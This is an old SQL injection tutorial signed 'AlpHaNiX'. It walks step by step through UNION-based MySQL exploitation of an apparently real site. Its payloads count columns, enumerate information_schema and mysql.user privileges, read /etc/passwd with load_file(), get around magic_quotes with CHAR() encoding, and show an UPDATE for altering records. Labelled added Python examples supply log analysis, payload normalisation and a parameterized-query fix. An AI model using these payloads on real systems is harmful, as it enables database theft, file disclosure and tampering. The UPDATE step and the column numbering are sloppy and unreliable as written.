Author : AlpHaNiX
contact : AlpHa[AT]Hacker[DOT]BZ
———————————————–
–= summary =–
0x000 - NULL
0x001 - Introduction
0x010 - Global Exploiting
0x011 - Exploiting The Bug
0x101 - Conclusion
0x110 - Helpful links
——————————————————
0x001 - Introduction :
SQL injection is a technique that allows you to exploit
a web vulnerability to extract the contents of the database
and have them shown to the injector, thanks to an error in
how the request is built …
——————————————————
0x010 - Global Exploiting :
Exploiting the SQL injection vulnerability
To exploit this vulnerability you need the following
conditions :
1- Null the query
2- Get the number of columns
-> To null the query it is enough to add something that doesn't
exist in the database
-> To find the number of columns in MySQL you can
use the following in the query : '+order+by+x--
x is the number of columns you are trying to guess :
=> if the page shows normally with no errors, this means that
the number you entered is < the real number of columns
=> if the page shows an error, this means that
the number you entered is > the real number of columns
now you are wondering how to know the real number of columns
i'll tell you , it's the number right before the 1st error !
Note : Don't forget the comment :
( -- or /* or # or a null byte )
i hope it's pretty clear
so build the query like this
=> ' union select 1,2,3--
1,2,3 -> number of columns
in our example the number of columns is 19 :
'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Note : I've started counting from 0 ,
xx - now let's get basic info about this database
=> DataBase Name
-> you can get the name of the db with 'database()'
' union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19--
The database is called "fluff2"
=> DataBase Version
-> you can get the version of the db with 'version()'
' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19--
The database version is "5"
=> DataBase Username
-> you can get the user of the db with 'user()'
' union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19--
The database username is "muu"
=> DataBase Location
-> you can get the data directory of the db with '@@datadir'
' union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19--
The database is located in "/var/lib/mysql/ "
xxx - Get your privileges !
Let's try any privs (select, update, file etc…)
' union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--
' union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--
' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--
it seems that nothing is allowed !
well , since our user is muu let's look at our privs where user = muu
' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--
we can see we have full privs now
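A defender's counterpart to the column-counting walk above, as an added example that is not from the paper: a small Python analyser that reads constructed Common Log Format lines, decodes the query strings, and flags a client whose ORDER BY probes converge on the same width as a later UNION SELECT placeholder list. It assumes the failed probe shows up as a 5xx status; many applications answer 200 with the error in the body, so keying on response size as well is the usual refinement.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not from the paper) replaying the walk the
# text describes: ORDER BY probes until the first error, then a UNION SELECT
# carrying one placeholder per column (19 here, counted from 0 like the paper).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2009:10:00:01 +0000] "GET /news.php?id=3 HTTP/1.1" 200 1523
10.0.0.5 - - [01/Jan/2009:10:00:04 +0000] "GET /news.php?id=3'+order+by+10-- HTTP/1.1" 200 1523
10.0.0.5 - - [01/Jan/2009:10:00:06 +0000] "GET /news.php?id=3'+order+by+20-- HTTP/1.1" 500 412
10.0.0.5 - - [01/Jan/2009:10:00:09 +0000] "GET /news.php?id=3'+order+by+19-- HTTP/1.1" 200 1523
10.0.0.5 - - [01/Jan/2009:10:00:15 +0000] "GET /news.php?id=3'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- HTTP/1.1" 200 1601
10.0.0.9 - - [01/Jan/2009:10:00:20 +0000] "GET /news.php?id=7 HTTP/1.1" 200 1490
"""

# Common Log Format: client, request line, status. Only what we need is captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.+?)(?:--|#|/\*|$)", re.I | re.S)

def analyse_log(text):
    """Per client IP: (n, status) for each ORDER BY n probe, and the width of
    every UNION SELECT placeholder list seen."""
    findings = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Undo %xx and '+' encoding so the SQL keywords are visible to the regexes.
        query = unquote_plus(urlsplit(m["url"]).query)
        rec = findings.setdefault(m["ip"], {"order_by": [], "union_columns": []})
        for n in ORDER_BY_RE.findall(query):
            rec["order_by"].append((int(n), int(m["status"])))
        for cols in UNION_RE.findall(query):
            rec["union_columns"].append(len(cols.split(",")))
    return findings

def suspicious_sources(findings):
    """Flag a client that probed ORDER BY and then sent a UNION whose width equals
    the largest probe value that did not error: the exact convergence the text
    walks through. Returns {ip: column_count}."""
    flagged = {}
    for ip, rec in findings.items():
        ok = [n for n, status in rec["order_by"] if status < 500]
        if ok and max(ok) in rec["union_columns"]:
            flagged[ip] = max(ok)
    return flagged
```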
——————————————————
0x011 - Exploiting The Bug :
let's try now to get the database content and use it !
=> uploading a file !
to upload any file magic_quotes has to be set 'OFF'
-> so what is magic_quotes ?
magic_quotes is a feature in PHP made to help coders
and developers avoid falling into SQL injection vulnerabilities
and it is going to be removed in PHP6 !
Well , in our FaceBook magic_quotes are set 'ON' ,
so we cannot use into outfile to upload a file .!
=> Getting DB content :
to read the content of a specific column , you must use the following
' union select 1,2,3,4,5,6,7,column,9,10,11,12,13,14,15,16,17,18,19 from table--
column -> the column you want to read
table -> the table where the wanted column is located
Now you wonder : you don't know column names or table names ,
so what to do ?
since the database is v5 it has to have information_schema inside
so let's exploit information_schema :
-> Get Tables :
' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--
Like you see it's showing the name of the table | database
but only one table appears ! what to do to show the rest ?
change concat into group_concat ; the exploit looks like this :
' union select 1,2,3,4,5,6,7,group_concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--
well it's showing some more
but this is not all
let's try something different !
add LIMIT 1 OFFSET 44-- at the end of our current exploit
' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44--
and change the '44' to another number and it will show another table
Now you wonder how to get table columns ?!
Alright , you can get table columns from information_schema.columns like the following
from+information_schema.columns+where+table_name="table_name"
so in our exploit it becomes like this :
' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where table_name='info'--
since magic_quotes is set 'ON' we must convert the table name to ASCII
' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where table_name=CHAR(105, 110, 102, 111)--
Bingo ! this is one column
to show the others use 'limit 1 offset'
You can see the content of any column =)
For now let's try to look for a specific table or a specific column !
you can get it using
' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like time--
Note : time is the column name you are looking for
and don't forget to change the column name to ASCII because magic_quotes is on
' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--
To see other info about the column, concatenate 'column_name' with table_schema and table_name
' union select 1,2,3,4,5,6,7,concat(column_name,0x7c,table_schema,0x7c,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--
Bingo ! You can see column , db , table , and look for any column ,
pretty easy , isn't it ?
=> Reading Any File content :
since we have file loading privileges , we can load any file
on the server (with the right permissions) and show it !
' union select 1,2,3,4,5,6,7,load_file(/etc/passwd),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=muu--
and convert to ASCII
' union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--
here we loaded the '/etc/passwd' file , i would like to
get the shadow but i don't have root privs xD
=> Updating the database :
since we have the update privilege we can change the value
of any field in the db !
the update query looks like the following :
' update table_name set column_name='new value' where column_name='value'
never forget to convert to ASCII xD
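The CHAR() and 0x.. forms above are what an analyst sees in a captured request; as an added example (not from the paper), this Python normaliser turns them back into readable literals and flags the information_schema, mysql.user, load_file() and into outfile references this section relies on. The sample query strings are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed query strings (not from the paper) in the shape the text uses,
# with table names, paths and separators hidden behind CHAR() and 0x.. tokens.
SAMPLES = [
    "id=1'+union+select+1,2,column_name,4+from+information_schema.columns+where+table_name=CHAR(105,110,102,111)--",
    "id=1'+union+select+1,2,load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100)),4+from+mysql.user+where+user=CHAR(109,117,117)--",
    "id=1'+union+select+1,2,concat(table_name,0x7c,table_schema,0x7c),4+from+information_schema.tables--",
    "id=42",
]

CHAR_RE = re.compile(r"\bCHAR\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)
HEX_RE = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

def _char_to_literal(m):
    # MySQL CHAR(105,110,102,111) is the string 'info'; rebuild it as a quoted literal.
    return "'" + "".join(chr(int(c)) for c in m.group(1).split(",")) + "'"

def _hex_to_literal(m):
    # MySQL treats 0x7c as the string '|' in string context.
    return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"

def normalise(query):
    """URL-decode, then rewrite CHAR(...) and 0x.. tokens as plain quoted literals."""
    text = unquote_plus(query)
    text = CHAR_RE.sub(_char_to_literal, text)
    return HEX_RE.sub(_hex_to_literal, text)

# Objects the text reaches for once it has the column count; any of them in a
# normalised request is worth an alert.
MARKERS = ("information_schema", "mysql.user", "load_file(", "into outfile", "union select")

def classify(query):
    """Return (normalised text, sorted markers found in it)."""
    text = normalise(query)
    low = " ".join(text.lower().split())
    return text, sorted(m for m in MARKERS if m in low)
```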
——————————————————
0x101 - Conclusion :
SQL injection vulnerabilities are present in 60% of scripts , and it's really important
to learn how to protect ourselves from them and write more secure scripts
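magic_quotes, as the exploitation section shows, only escapes quotes and is sidestepped with CHAR(); the protection the conclusion asks for is parameter binding. Added example, not the paper's code: Python with the standard-library sqlite3 module standing in for PHP and MySQL, showing the spliced-string query beside the bound-parameter one on a constructed two-table schema. The same fix is available in PHP through mysqli or PDO prepared statements.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for a small site database (not the paper's)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        CREATE TABLE info(id INTEGER, login TEXT, secret TEXT);
        INSERT INTO news VALUES (3, 'public story');
        INSERT INTO info VALUES (1, 'muu', 'top secret');
    """)
    return con

def news_titles_unsafe(con, news_id):
    # The pattern the paper lives on: user input spliced straight into the SQL text,
    # so a quote ends the literal and whatever follows becomes part of the statement.
    sql = "SELECT id, title FROM news WHERE id='" + news_id + "'"
    return [row[1] for row in con.execute(sql)]

def news_titles_safe(con, news_id):
    # Parameter binding: the value travels separately from the SQL, so quotes,
    # comments and UNION keywords in it are data and never syntax. Nothing the
    # paper does with magic_quotes or CHAR() changes that.
    sql = "SELECT id, title FROM news WHERE id=?"
    return [row[1] for row in con.execute(sql, (news_id,))]

# The paper's UNION shape, narrowed to this two-column query.
PAYLOAD = "3' UNION SELECT id, secret FROM info--"

if __name__ == "__main__":
    con = make_db()
    print("unsafe:", news_titles_unsafe(con, PAYLOAD))   # leaks 'top secret'
    print("safe:  ", news_titles_safe(con, PAYLOAD))     # []
```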
——————————————————
0x110 - Helpful Links :
——————————————————
Be Safe
./AlpHaNiX